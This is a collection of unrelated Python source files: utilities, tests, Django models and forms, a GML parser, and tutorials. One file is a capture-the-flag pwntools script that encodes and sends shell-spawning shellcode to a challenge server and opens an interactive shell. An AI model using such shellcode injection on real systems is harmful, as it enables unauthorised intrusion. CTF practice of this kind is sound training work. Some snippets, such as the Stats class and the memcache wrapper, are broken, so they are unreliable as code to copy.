#!/usr/bin/env python # -*- coding: utf-8 -*- # @Author : qichun tang # @Date : 2020-12-15 # @Contact : [email protected] import hashlib from copy import deepcopy from typing import Union, Dict, Any import numpy as np from ConfigSpace import Configuration from scipy.sparse import issparse def get_hash_of_array(X, m=None): if m is None: m = hashlib.md5() if issparse(X): m.update(X.indices) m.update(X.indptr) m.update(X.data) m.update(str(X.shape).encode('utf8')) else: if X.flags['C_CONTIGUOUS']: m.update(X.data) m.update(str(X.shape).encode('utf8')) else: X_tmp = np.ascontiguousarray(X.T) m.update(X_tmp.data) m.update(str(X_tmp.shape).encode('utf8')) hash = m.hexdigest() return hash def sort_dict(obj): if isinstance(obj, dict): for k, v in obj.items(): obj[k] = sort_dict(v) return dict(sorted(obj.items(), key=lambda x: str(x[0]))) elif isinstance(obj, list): for i, elem in enumerate(obj): obj[i] = sort_dict(elem) return list(sorted(obj, key=str)) else: return obj def get_hash_of_dict(dict_, m=None): if m is None: m = hashlib.md5() sorted_dict = sort_dict(deepcopy(dict_)) # sorted_dict = deepcopy(dict_) m.update(str(sorted_dict).encode("utf-8")) return m.hexdigest() def get_hash_of_config(config: Union[Configuration, Dict[str, Any]], m=None): if m is None: m = hashlib.md5() assert isinstance(config, (dict, Configuration)) if isinstance(config, Configuration): config = config.get_dictionary() return get_hash_of_dict(config, m)
python
import unittest from etl import sources from unittest.mock import patch, MagicMock class TestODKSource(unittest.TestCase): def test_fix_odk_sunmission(self): """ Testing fix odk submission""" data = { "@a": "a", "b": "b", "orx:meta": "should_not_be_there" } fixed_data = sources.__fix_odk_data(data) self.assertEqual(fixed_data, { "a": "a", "b": "b" }) @patch("etl.sources.requests") def test_get_odk_submission(self, mock_requsts): """ Testing get submission""" result_mock = MagicMock() result_mock.text = '<submission xmlns="http://opendatakit.org/submissions" xmlns:orx="http://openrosa.org/xforms" ><data><test_form id="test" instanceID="uuid:7ba84cc0-ef88-4e68-95cd-256a0f4ac0f7" submissionDate="2018-10-25T13:08:58.093Z" isComplete="true" markedAsCompleteDate="2018-10-25T13:08:58.093Z"><person_name>09179615-72fd-4ec9-92d7-fa702358ea54</person_name><orx:meta><orx:instanceID>uuid:7ba84cc0-ef88-4e68-95cd-256a0f4ac0f7</orx:instanceID></orx:meta></test_form></data></submission>' result_mock.status_code = 200 mock_requsts.get = MagicMock(return_value=result_mock) url = "http://test.test" auth = "http-auth" result = sources.__get_odk_submission(url, auth, "test_form", "uuid-a") self.assertEqual(result["person_name"], "09179615-72fd-4ec9-92d7-fa702358ea54") @patch("etl.sources.requests") @patch("etl.sources.get_odk_submission") def test_get_odk_data(self, mock_get_odk_submission,mock_requsts,): """ Testing get submission""" result_mock = MagicMock() result_mock.text = '<idChunk xmlns="http://opendatakit.org/submissions"><idList><id>uuid:7ba84cc0-ef88-4e68-95cd-256a0f4ac0f7</id><id>uuid:bb6e48f4-ef3c-4291-b943-42c8d2a044c1</id><id>uuid:5c1bc811-6542-4221-b50a-054db7ab13ae</id><id>uuid:5c9e3d0a-bacc-4814-b2b3-3c33b6813712</id><id>uuid:8c005761-ae11-4975-a923-e5e55cb12882</id><id>uuid:0d0047e9-8fa4-499b-a5d9-665cd072e9b5</id><id>uuid:0969f963-ae52-404f-82c5-2db451a5e1af</id><id>uuid:121c2dcb-fffd-4f83-a483-5e1ee8b29686</id><id>uuid:60c67f01-b5fa-4595-b15d-cad1f89a8e04</id></idList><resumptionCursor>&lt;cursor xmlns="http://www.opendatakit.org/cursor"&gt;&lt;attributeName&gt;_LAST_UPDATE_DATE&lt;/attributeName&gt;&lt;attributeValue&gt;2018-10-25T13:09:02.355+0000&lt;/attributeValue&gt;&lt;uriLastReturnedValue&gt;uuid:60c67f01-b5fa-4595-b15d-cad1f89a8e04&lt;/uriLastReturnedValue&gt;&lt;isForwardCursor&gt;true&lt;/isForwardCursor&gt;&lt;/cursor&gt;</resumptionCursor></idChunk>' result_mock.status_code = 200 mock_requsts.get = MagicMock(return_value=result_mock) mock_get_odk_submission.return_value = {"a": "a"} data = sources.get_odk_data("test_url", "test_user", "test_password", "test_form") mock_get_odk_submission.assert_called_with( "test_url", mock_requsts.auth.HTTPDigestAuth("test_user", "test_password"), "test_form", "uuid:60c67f01-b5fa-4595-b15d-cad1f89a8e04") self.assertEqual(data.columns, ["a"]) self.assertEqual(len(data), 9)
python
"""Tests for driver.py""" import pytest import pandas as pd from pandas.testing import assert_frame_equal from timeflux.core.io import Port def test_nexus(): assert True
python
# -*- coding: utf-8 -*- from .file_read_backwards import FileReadBackwards # noqa: F401 __author__ = """Robin Robin""" __email__ = '[email protected]' __version__ = '1.1.2' __github__ = 'https://github.com/robin81/file_read_backwards'
python
import numpy as np class Stats(list): def __init__(self,list): self.list = list self.length = len(list) self.mean = sum(list)/self.length #If list is even if self.length % 2 == 0: self.medianEven = median(list) else: self.medianOdd = median(list) self.mode = mode(list) #Used to calculate variance and stanadard deviation for x in list: self.temp = (x - self.mean)**2 self.variance = temp/(self.length-1) self.std_dev = sqrt(temp/self.length) self.cof_var = self.std_dev/self.mean
python
expected_output = { 'vll': { 'MY-QINQ-VLL-LOCAL': { 'vll_id': 4, 'ifl_id': '4096', 'state': 'UP', 'endpoint': { 1: { 'type': 'tagged', 'outer_vlan_id': 100, 'inner_vlan_id': 45, 'interface': 'ethernet2/1', 'cos': '--' }, 2: { 'type': 'tagged', 'vlan_id': 100, 'interface': 'ethernet2/3', 'cos': '--' } }, 'extended_counters': True } } }
python
""" Given an array A of strings made only from lowercase letters, return a list of all characters that show up in all strings within the list (including duplicates). For example, if a character occurs 3 times in all strings but not 4 times, you need to include that character three times in the final answer. You may return the answer in any order. Example 1: Input: ["bella","label","roller"] Output: ["e","l","l"] """ class Solution1002: pass
python
#! /usr/bin/env python3 from sys import argv errno = { '0': 'Success', '1': 'TooBig', '2': 'Acces', '3': 'Addrinuse', '4': 'Addrnotavail', '5': 'Afnosupport', '6': 'Again', '7': 'Already', '8': 'Badf', '9': 'Badmsg', '10': 'Busy', '11': 'Canceled', '12': 'Child', '13': 'Connaborted', '14': 'Connrefused', '15': 'Connreset', '16': 'Deadlk', '17': 'Destaddrreq', '18': 'Dom', '19': 'Dquot', '20': 'Exist', '21': 'Fault', '22': 'Fbig', '23': 'Hostunreach', '24': 'Idrm', '25': 'Ilseq', '26': 'Inprogress', '27': 'Intr', '28': 'Inval', '29': 'Io', '30': 'Isconn', '31': 'Isdir', '32': 'Loop', '33': 'Mfile', '34': 'Mlink', '35': 'Msgsize', '36': 'Multihop', '37': 'Nametoolong', '38': 'Netdown', '39': 'Netreset', '40': 'Netunreach', '41': 'Nfile', '42': 'Nobufs', '43': 'Nodev', '44': 'Noent', '45': 'Noexec', '46': 'Nolck', '47': 'Nolink', '48': 'Nomem', '49': 'Nomsg', '50': 'Noprotoopt', '51': 'Nospc', '52': 'Nosys', '53': 'Notconn', '54': 'Notdir', '55': 'Notempty', '56': 'Notrecoverable', '57': 'Notsock', '58': 'Notsup', '59': 'Notty', '60': 'Nxio', '61': 'Overflow', '62': 'Ownerdead', '63': 'Perm', '64': 'Pipe', '65': 'Proto', '66': 'Protonosupport', '67': 'Prototype', '68': 'Range', '69': 'Rofs', '70': 'Spipe', '71': 'Srch', '72': 'Stale', '73': 'Timedout', '74': 'Txtbsy', '75': 'Xdev', '76': 'Notcapable', } desc = { 'success': 'No error occurred. System call completed successfully.', 'toobig': 'Argument list too long.', 'acces': 'Permission denied.', 'addrinuse': 'Address in use.', 'addrnotavail': 'Address not available.', 'afnosupport': 'Address family not supported.', 'again': 'Resource unavailable, or operation would block.', 'already': 'Connection already in progress.', 'badf': 'Bad file descriptor.', 'badmsg': 'Bad message.', 'busy': 'Device or resource busy.', 'canceled': 'Operation canceled.', 'child': 'No child processes.', 'connaborted': 'Connection aborted.', 'connrefused': 'Connection refused.', 'connreset': 'Connection reset.', 'deadlk': 'Resource deadlock would occur.', 'destaddrreq': 'Destination address required.', 'dom': 'Mathematics argument out of domain of function.', 'dquot': 'Reserved.', 'exist': 'File exists.', 'fault': 'Bad address.', 'fbig': 'File too large.', 'hostunreach': 'Host is unreachable.', 'idrm': 'Identifier removed.', 'ilseq': 'Illegal byte sequence.', 'inprogress': 'Operation in progress.', 'intr': 'Interrupted function.', 'inval': 'Invalid argument.', 'io': 'I/O error.', 'isconn': 'Socket is connected.', 'isdir': 'Is a directory.', 'loop': 'Too many levels of symbolic links.', 'mfile': 'File descriptor value too large.', 'mlink': 'Too many links.', 'msgsize': 'Message too large.', 'multihop': 'Reserved.', 'nametoolong': 'Filename too long.', 'netdown': 'Network is down.', 'netreset': 'Connection aborted by network.', 'netunreach': 'Network unreachable.', 'nfile': 'Too many files open in system.', 'nobufs': 'No buffer space available.', 'nodev': 'No such device.', 'noent': 'No such file or directory.', 'noexec': 'Executable file format error.', 'nolck': 'No locks available.', 'nolink': 'Reserved.', 'nomem': 'Not enough space.', 'nomsg': 'No message of the desired type.', 'noprotoopt': 'Protocol not available.', 'nospc': 'No space left on device.', 'nosys': 'Function not supported.', 'notconn': 'The socket is not connected.', 'notdir': 'Not a directory or a symbolic link to a directory.', 'notempty': 'Directory not empty.', 'notrecoverable': 'State not recoverable.', 'notsock': 'Not a socket.', 'notsup': 'Not supported, or operation not supported on socket.', 'notty': 'Inappropriate I/O control operation.', 'nxio': 'No such device or address.', 'overflow': 'Value too large to be stored in data type.', 'ownerdead': 'Previous owner died.', 'perm': 'Operation not permitted.', 'pipe': 'Broken pipe.', 'proto': 'Protocol error.', 'protonosupport': 'Protocol not supported.', 'prototype': 'Protocol wrong type for socket.', 'range': 'Result too large.', 'rofs': 'Read-only file system.', 'spipe': 'Invalid seek.', 'srch': 'No such process.', 'stale': 'Reserved.', 'timedout': 'Connection timed out.', 'txtbsy': 'Text file busy.', 'xdev': 'Cross-device link.', 'notcapable': 'Extension: Capabilities insufficient.', } if __name__ == '__main__': if len(argv) == 1: print(f"Usage: {argv[0]} errno ...") else: for arg in argv[1:]: if arg in errno: print(f"{arg}: {errno[arg]} -- {desc[errno[arg].lower()]}") else: print(f"{arg}: ***UNKNOWN ERROR NUMBER***")
python
""" Read graphs in GML format. "GML, the G>raph Modelling Language, is our proposal for a portable file format for graphs. GML's key features are portability, simple syntax, extensibility and flexibility. A GML file consists of a hierarchical key-value lists. Graphs can be annotated with arbitrary data structures. The idea for a common file format was born at the GD'95; this proposal is the outcome of many discussions. GML is the standard file format in the Graphlet graph editor system. It has been overtaken and adapted by several other systems for drawing graphs." See http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html Requires pyparsing: http://pyparsing.wikispaces.com/ Format ------ See http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html for format specification. Example graphs in GML format: http://www-personal.umich.edu/~mejn/netdata/ """ __author__ = """Aric Hagberg ([email protected])""" # Copyright (C) 2008-2010 by # Aric Hagberg <[email protected]> # Dan Schult <[email protected]> # Pieter Swart <[email protected]> # All rights reserved. # BSD license. __all__ = ['read_gml', 'parse_gml', 'generate_gml', 'write_gml'] import networkx as nx from networkx.exception import NetworkXError from networkx.utils import is_string_like, open_file @open_file(0,mode='rb') def read_gml(path,encoding='UTF-8',relabel=False): """Read graph in GML format from path. Parameters ---------- path : filename or filehandle The filename or filehandle to read from. encoding : string, optional Text encoding. relabel : bool, optional If True use the GML node label attribute for node names otherwise use the node id. Returns ------- G : MultiGraph or MultiDiGraph Raises ------ ImportError If the pyparsing module is not available. See Also -------- write_gml, parse_gml Notes ----- Requires pyparsing: http://pyparsing.wikispaces.com/ References ---------- GML specification: http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html Examples -------- >>> G=nx.path_graph(4) >>> nx.write_gml(G,'test.gml') >>> H=nx.read_gml('test.gml') """ lines=(line.decode(encoding) for line in path) G=parse_gml(lines,relabel=relabel) return G def parse_gml(lines, relabel=True): """Parse GML graph from a string or iterable. Parameters ---------- lines : string or iterable Data in GML format. relabel : bool, optional If True use the GML node label attribute for node names otherwise use the node id. Returns ------- G : MultiGraph or MultiDiGraph Raises ------ ImportError If the pyparsing module is not available. See Also -------- write_gml, read_gml Notes ----- This stores nested GML attributes as dictionaries in the NetworkX graph, node, and edge attribute structures. Requires pyparsing: http://pyparsing.wikispaces.com/ References ---------- GML specification: http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html """ try: from pyparsing import ParseException except ImportError: try: from matplotlib.pyparsing import ParseException except: raise ImportError('Import Error: not able to import pyparsing:', 'http://pyparsing.wikispaces.com/') try: data = "".join(lines) gml = pyparse_gml() tokens =gml.parseString(data) except ParseException as err: print((err.line)) print((" "*(err.column-1) + "^")) print(err) raise # function to recursively make dicts of key/value pairs def wrap(tok): listtype=type(tok) result={} for k,v in tok: if type(v)==listtype: result[str(k)]=wrap(v) else: result[str(k)]=v return result # Set flag multigraph=False # but assume multigraphs to start if tokens.directed==1: G=nx.MultiDiGraph() else: G=nx.MultiGraph() for k,v in tokens.asList(): if k=="node": vdict=wrap(v) node=vdict['id'] G.add_node(node,attr_dict=vdict) elif k=="edge": vdict=wrap(v) source=vdict.pop('source') target=vdict.pop('target') if G.has_edge(source,target): multigraph=True G.add_edge(source,target,attr_dict=vdict) else: G.graph[k]=v # switch to Graph or DiGraph if no parallel edges were found. if not multigraph: if G.is_directed(): G=nx.DiGraph(G) else: G=nx.Graph(G) if relabel: # relabel, but check for duplicate labels first mapping=[(n,d['label']) for n,d in G.node.items()] x,y=zip(*mapping) if len(set(y))!=len(G): raise NetworkXError('Failed to relabel nodes: ' 'duplicate node labels found. ' 'Use relabel=False.') G=nx.relabel_nodes(G,dict(mapping)) return G def pyparse_gml(): """A pyparsing tokenizer for GML graph format. This is not intended to be called directly. See Also -------- write_gml, read_gml, parse_gml """ try: from pyparsing import \ Literal, CaselessLiteral, Word, Forward,\ ZeroOrMore, Group, Dict, Optional, Combine,\ ParseException, restOfLine, White, alphas, alphanums, nums,\ OneOrMore,quotedString,removeQuotes,dblQuotedString, Regex except ImportError: try: from matplotlib.pyparsing import \ Literal, CaselessLiteral, Word, Forward,\ ZeroOrMore, Group, Dict, Optional, Combine,\ ParseException, restOfLine, White, alphas, alphanums, nums,\ OneOrMore,quotedString,removeQuotes,dblQuotedString, Regex except: raise ImportError('pyparsing not found', 'http://pyparsing.wikispaces.com/') lbrack = Literal("[").suppress() rbrack = Literal("]").suppress() pound = ("#") comment = pound + Optional( restOfLine ) integer = Word(nums+'-').setParseAction(lambda s,l,t:[ int(t[0])]) real = Regex(r"[+-]?\d+\.\d*([eE][+-]?\d+)?").setParseAction( lambda s,l,t:[ float(t[0]) ]) dblQuotedString.setParseAction( removeQuotes ) key = Word(alphas,alphanums+'_') value_atom = (real | integer | Word(alphanums) | dblQuotedString) value = Forward() # to be defined later with << operator keyvalue = Group(key+value) value << (value_atom | Group( lbrack + ZeroOrMore(keyvalue) + rbrack )) node = Group(Literal("node") + lbrack + Group(OneOrMore(keyvalue)) + rbrack) edge = Group(Literal("edge") + lbrack + Group(OneOrMore(keyvalue)) + rbrack) creator = Group(Literal("Creator")+ Optional( restOfLine )) version = Group(Literal("Version")+ Optional( restOfLine )) graphkey = Literal("graph").suppress() graph = Dict (Optional(creator)+Optional(version)+\ graphkey + lbrack + ZeroOrMore( (node|edge|keyvalue) ) + rbrack ) graph.ignore(comment) return graph def generate_gml(G): """Generate a single entry of the graph G in GML format. Parameters ---------- G : NetworkX graph Returns ------- lines: string Lines in GML format. Notes ----- This implementation does not support all Python data types as GML data. Nodes, node attributes, edge attributes, and graph attributes must be either dictionaries or single stings or numbers. If they are not an attempt is made to represent them as strings. For example, a list as edge data G[1][2]['somedata']=[1,2,3], will be represented in the GML file as:: edge [ source 1 target 2 somedata "[1, 2, 3]" ] """ # recursively make dicts into gml brackets def listify(d,indent,indentlevel): result='[ \n' for k,v in d.items(): if type(v)==dict: v=listify(v,indent,indentlevel+1) result += indentlevel*indent+"%s %s\n"%(k,v) return result+indentlevel*indent+"]" def string_item(k,v,indent): # try to make a string of the data if type(v)==dict: v=listify(v,indent,2) elif is_string_like(v): v='"%s"'%v elif type(v)==bool: v=int(v) return "%s %s"%(k,v) # check for attributes or assign empty dict if hasattr(G,'graph_attr'): graph_attr=G.graph_attr else: graph_attr={} if hasattr(G,'node_attr'): node_attr=G.node_attr else: node_attr={} indent=2*' ' count=iter(range(len(G))) node_id={} yield "graph [" if G.is_directed(): yield indent+"directed 1" # write graph attributes for k,v in G.graph.items(): yield indent+string_item(k,v,indent) # write nodes for n in G: yield indent+"node [" # get id or assign number nid=G.node[n].get('id',next(count)) node_id[n]=nid yield 2*indent+"id %s"%nid label=G.node[n].pop('label',n) if is_string_like(label): label='"%s"'%label yield 2*indent+'label %s'%label if n in G: for k,v in G.node[n].items(): if k=='id': continue yield 2*indent+string_item(k,v,indent) yield indent+"]" # write edges for u,v,edgedata in G.edges_iter(data=True): yield indent+"edge [" yield 2*indent+"source %s"%node_id[u] yield 2*indent+"target %s"%node_id[v] for k,v in edgedata.items(): if k=='source': continue if k=='target': continue yield 2*indent+string_item(k,v,indent) yield indent+"]" yield "]" @open_file(1,mode='wb') def write_gml(G, path): """ Write the graph G in GML format to the file or file handle path. Parameters ---------- path : filename or filehandle The filename or filehandle to write. Filenames ending in .gz or .gz2 will be compressed. See Also -------- read_gml, parse_gml Notes ----- GML specifications indicate that the file should only use 7bit ASCII text encoding.iso8859-1 (latin-1). This implementation does not support all Python data types as GML data. Nodes, node attributes, edge attributes, and graph attributes must be either dictionaries or single stings or numbers. If they are not an attempt is made to represent them as strings. For example, a list as edge data G[1][2]['somedata']=[1,2,3], will be represented in the GML file as:: edge [ source 1 target 2 somedata "[1, 2, 3]" ] Examples --------- >>> G=nx.path_graph(4) >>> nx.write_gml(G,"test.gml") Filenames ending in .gz or .bz2 will be compressed. >>> nx.write_gml(G,"test.gml.gz") """ for line in generate_gml(G): line+='\n' path.write(line.encode('latin-1')) # fixture for nose tests def setup_module(module): from nose import SkipTest try: import pyparsing except: try: import matplotlib.pyparsing except: raise SkipTest("pyparsing not available") # fixture for nose tests def teardown_module(module): import os os.unlink('test.gml') os.unlink('test.gml.gz')
python
# py2.7 and py3 compatibility imports from __future__ import absolute_import from __future__ import unicode_literals from django.conf.urls import url, include from rest_framework import routers from . import views router = routers.DefaultRouter() router.register(r'shadowsocks/config', views.ConfigViewSet) router.register(r'shadowsocks/account', views.AccountViewSet) router.register(r'shadowsocks/node', views.NodeViewSet) router.register(r'shadowsocks/nodeaccount', views.NodeAccountViewSet) router.register(r'shadowsocks/ssmanager', views.SSManagerViewSet) urlpatterns = [ url(r'^', include(router.urls)), ]
python
''' Working with files in Python ''' # reading and writing files path_to_file = '00 - Very Basics/text_files/' file_name1 = input('What is the file name you want to write to? ') try: file1 = open('{}/{}.txt'.format(path_to_file, file_name1), 'w') file1.write(''' You don't know how to be a man I open myself, you close me, I want to run, but you catch me again, I want to cry out, you tell me to shut up, Why do I do it? I throw myself, like a child I listen to you, pleasant, humble Why do I do it? Why don't I leave, why do I settle? I gave you power over me, I am strong but not this way, but not now When do I have to say it; How do I say it to you? You don't know how to be a man For a girl. You didn't even try, Not even once. My argument is mute, It's just for me. You don't know how to be a man And nobody teaches you how. ''') file1.close() except FileNotFoundError as error: print(error) else: print('Text file was correctelly created/written.') file_name2 = input('What is the file name you want to read from? ') try: file2 = open('{}/{}.txt'.format(path_to_file, file_name2), 'r') print(file2.read()) file2.close() except FileNotFoundError as error: print(error) else: print('File was read correctelly.') print(file1.closed) print(file2.closed) try: with open('{}/{}.txt'.format(path_to_file, file_name2)) as myFile: print(myFile.read()) except FileNotFoundError as error: print(error) songs = [ 'Visele', 'Iubirea noastra muta', 'Da\' ce tu', 'Haina ta', 'Ce s-a intamplat cu noi', 'My Favourite Man', 'Bandana', 'Bolnavi amandoi', 'Cosmos', 'Octombrie Rosu', 'Eroii pieselor noastre', 'Beau', 'In locul meu', 'Cel mai bun prieten', 'Nu stii tu sa fii barbat' ] try: with open('{}/{}'.format(path_to_file, 'irina_rimes_songs.txt'), 'w') as songs_file: for song in songs: songs_file.write('{}\n'.format(song)) except FileNotFoundError as error: print(error) try: with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt'), 'w') as songs_file: for song in songs: songs_file.writelines('%s\n'%song) except FileNotFoundError as error: print(error) with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt')) as songs_file: print(songs_file.readline(10)) print(songs_file.tell()) print(songs_file.readlines()) with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt')) as songs_file: print(songs_file.tell()) songs_file.seek(10, 0) print(songs_file.tell()) print(songs_file.read(15)) print(songs_file.tell()) with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt'), 'r+') as songs_file: songs_file.seek(0, 2) print(songs_file.tell()) songs_file.write('Hello') # os module import os print(os.getcwd()) # print(os.get_exec_path()) try: os.mkdir('nice_folder') except Exception: pass print(os.path.isdir('nice_folder')) try: os.rename('nice_folder', 'ugly_folder') except Exception: pass print(os.path.isdir('nice_folder')) try: os.remove('ugly_folder') except Exception as error: print(error)
python
from django.contrib.auth import get_user_model from django.db import models, transaction from django.utils import timezone from django.utils.translation import ugettext_lazy as _ from libs.models import BaseModel User = get_user_model() class State(BaseModel): name = models.CharField(verbose_name=_('name'), max_length=80) def __str__(self): return self.name class Meta: verbose_name = _('State') verbose_name_plural = _('States') db_table = 'state' class City(BaseModel): name = models.CharField(verbose_name=_('name'), max_length=80) state = models.ForeignKey(State, related_name='cities', on_delete=models.CASCADE, verbose_name=_('state')) def __str__(self): return f'{self.name} - {self.state}' class Meta: verbose_name = _('City') verbose_name_plural = _('Cities') db_table = 'city' class AirLine(BaseModel): name = models.CharField(verbose_name=_('name'), max_length=80) def __str__(self): return self.name class Meta: verbose_name = _('Air Line') verbose_name_plural = _('Air Lines') db_table = 'airline' class Plane(BaseModel): name = models.CharField(verbose_name=_('name'), max_length=50) airline = models.ForeignKey(AirLine, related_name='planes', on_delete=models.CASCADE, verbose_name=_('air line')) capacity = models.PositiveSmallIntegerField(verbose_name=_('capacity')) def __str__(self): return f'{self.name} - {self.airline} - {self.capacity}' class Meta: verbose_name = _('Plane') verbose_name_plural = _('Planes') db_table = 'plane' class Flight(BaseModel): flight_number = models.CharField(max_length=150, verbose_name=_('flight number')) plane = models.ForeignKey(Plane, related_name='flights', on_delete=models.CASCADE, verbose_name=_('plane')) from_city = models.ForeignKey( City, related_name='origin_flights', on_delete=models.CASCADE, verbose_name=_('origin') ) to_city = models.ForeignKey( City, related_name='destination_flights', on_delete=models.CASCADE, verbose_name=_('destination') ) depart_datetime = models.DateTimeField(verbose_name=_('depart datetime')) arrive_datetime = models.DateTimeField(verbose_name=_('modified time')) price = models.IntegerField(verbose_name=_('price')) def prototype_create_seats(self): for c in range(1, self.plane.capacity + 1): FlightSeat.objects.create(flight=self, seat=Seat.objects.create(number=c)) def available_flight_depart_datetime(self): return bool(self.depart_datetime > timezone.now()) def __str__(self): return self.flight_number class Meta: verbose_name = _('Flight') verbose_name_plural = _('Flights') db_table = 'flight' class Seat(BaseModel): number = models.PositiveSmallIntegerField(verbose_name=_('number')) is_reserve = models.BooleanField(verbose_name=_('is reserve'), default=False) reserved_time = models.DateTimeField(default=None, null=True, blank=True) def __str__(self): return f'{self.number} - {self.is_reserve}' class Meta: verbose_name = _('Seat') verbose_name_plural = _('Seats') db_table = 'seat' class FlightSeat(BaseModel): flight = models.ForeignKey(Flight, related_name='flight_seats', on_delete=models.CASCADE, verbose_name=_('flight')) seat = models.ForeignKey(Seat, related_name='flight_seats', on_delete=models.CASCADE, verbose_name=_('seat')) customer = models.ForeignKey( User, related_name='flight_seats', on_delete=models.CASCADE, verbose_name=_('customer'), null=True, blank=True ) def __str__(self): return f'{self.id}' def available_flight_seat(self): return bool(self.customer is None and not self.seat.is_reserve) class Meta: verbose_name = _('Flight Seat') verbose_name_plural = _('Flight Seats') db_table = 'flight_seat'
python
from .contract import Contract # noqa from .template import Template, TemplateError # noqa from .asyncio.contract import AsyncContract # noqa from .asyncio.template import AsyncTemplate # noqa __all__ = ( "Contract", "Template", "TemplateError", "AsyncContract", "AsyncTemplate" ) __version__ = '0.0.4'
python
# Generated by Django 2.2.9 on 2020-02-12 10:06 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('events', '0075_change_place_srid'), ] operations = [ migrations.AlterField( model_name='image', name='license', field=models.ForeignKey(default='event_only', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='images', to='events.License', verbose_name='License'), ), ]
python
import memcache import simplejson class SimplejsonWrapper(object): def __init__(self, file, protocol=None): self.file = file def dump(self, value) simplejson.dump(value, self.file) def load(self): return simplejson.load(self.file) cache = memcache.Client(['127.0.0.1:11211'], pickler=SimplejsonWrapper, unpickler=SimplejsonWrapper)
python
from pwn import * context.binary = elf = ELF("shellcoded") r = remote("challenge.ctf.games", 32175) # shellcode from pwn library shellcode = list(asm(shellcraft.sh())) # manually find shellcode online #shellcode = list(b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05') modified_sc = [] # reverse the action done by the binary for i in range(len(shellcode)): if i & 1 != 0: v3 = 1 else: v3 = -1 # 1. '& 0xFF': brings negative int back to unsigned byte convertible range # 2. byte-order: little since arch is amd-64-little # 3. byte code shld be unsigned, since adding or subtracting from the original compiled shell code # will result in unsigned overflow if not within range 0 to 0xff, which brings it back to the original bytecode in the shellcode modified_sc.append(((shellcode[i] + (v3 * i))&0xFF).to_bytes(1, byteorder = 'little', signed = False)) str_sc = b''.join(modified_sc) # payload print(str_sc) r.sendline(str_sc) r.interactive() # flag{f27646ae277113d24c73dbc66a816721}
python
from kNUI.main import run
python
token = "your new token here"
python
from django import forms from django.contrib.auth import authenticate from django.contrib.auth.forms import PasswordResetForm, SetPasswordForm from django.core.validators import MinLengthValidator from django.db.models import Q from django.contrib.auth.models import User from social_django.views import complete from accounts.models import Instructor class UserForm(forms.ModelForm): """ This form allow user to edit his profile. On profile page there are a couple of forms with required fields. Field form_id is here to check what form was submitted. In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it. If form_id not found in request.POST we will not validate this form. """ form_id = forms.CharField(max_length=255, initial='user_form', widget=forms.HiddenInput()) class Meta: model = User fields = ('form_id', 'first_name', 'last_name') widgets = { 'id': forms.HiddenInput(), 'form_id': forms.HiddenInput(), } class ChangeEmailForm(forms.Form): """ Field form_id is here to check what form was submitted. In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it. If form_id not found in request.POST we will not validate this form. """ form_id = forms.CharField(max_length=255, initial='email_form', widget=forms.HiddenInput()) email = forms.EmailField() def clean_email(self): email = self.cleaned_data['email'] my_email = self.initial['email'] if 'email' in self.changed_data: already_taken = User.objects.filter( Q(email=email) | Q(secondary__email=email) ).exclude(email=my_email) if already_taken: raise forms.ValidationError('This email already taken.') return email def save(self, request, commit=True): """ This form calls to `complete` function of python-social-auth. Send email to the user with confirmation link when user changes his email. :param request: django request :param commit: save to db or not? :return: """ if self.initial['email'] != self.cleaned_data['email']: return complete(request, 'email', force_update=True) class InstructorForm(forms.ModelForm): """ Field form_id is here to check what form was submitted. In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it. If form_id not found in request.POST we will not validate this form. """ form_id = forms.CharField(max_length=255, initial='instructor_form', widget=forms.HiddenInput()) class Meta: model = Instructor fields = ('form_id', 'user', 'institution') widgets = { 'user': forms.HiddenInput(), 'form_id': forms.HiddenInput(), } class CreatePasswordForm(forms.ModelForm): """This form will be used in case when user has no password and wants to create it.""" form_id = forms.CharField(max_length=255, initial='password_form', widget=forms.HiddenInput()) confirm_password = forms.CharField(max_length=255, widget=forms.PasswordInput(), validators=[MinLengthValidator(6)]) password = forms.CharField(max_length=255, widget=forms.PasswordInput(), validators=[MinLengthValidator(6)]) def clean(self): data = self.cleaned_data if data.get('password') != data.get('confirm_password'): self.add_error(None, 'Password and Confirm password fields doesn\'t match.') raise forms.ValidationError( {'password': 'Should be equal to confirm password field.', 'confirm_password': 'Should be equal to password field.'}) return self.cleaned_data class Meta: model = User fields = ('password', 'confirm_password', 'form_id') def save(self, commit=True): self.instance.set_password(self.cleaned_data['password']) if commit: self.instance.save() return self.instance class ChangePasswordForm(CreatePasswordForm): """ Field form_id is here to check what form was submitted. In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it. If form_id not found in request.POST we will not validate this form. """ current_password = forms.CharField(max_length=255, widget=forms.PasswordInput()) def clean(self): data = self.cleaned_data if data.get('password') != data.get('confirm_password'): self.add_error('password', 'Should be equal to confirm password field.') self.add_error('confirm_password', 'Should be equal to password field.') self.add_error(None, 'Password and Confirm password fields doesn\'t match.') return self.cleaned_data def clean_current_password(self): current_pw = self.cleaned_data.get('current_password') user = authenticate(username=self.instance, password=current_pw) if user is None: self.add_error('current_password', 'Provided current password doesn\'t match your password') return current_pw class Meta: model = User fields = ('current_password', 'password', 'confirm_password', 'form_id') class DeleteAccountForm(forms.ModelForm): """ Field form_id is here to check what form was submitted. In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it. If form_id not found in request.POST we will not validate this form. """ form_id = forms.CharField(max_length=255, initial='delete_account_form', widget=forms.HiddenInput()) confirm_delete_account = forms.BooleanField( required=True, widget=forms.HiddenInput(), initial=False ) def save(self, commit=True): self.instance.is_active = False if commit: self.instance.save() return self.instance class Meta: model = User fields = ('form_id', 'confirm_delete_account') widgets = { 'id': forms.HiddenInput(), } class CustomPasswordResetForm(PasswordResetForm): """ Field form_id is here to check what form was submitted. In view: If we found that form_id is present in 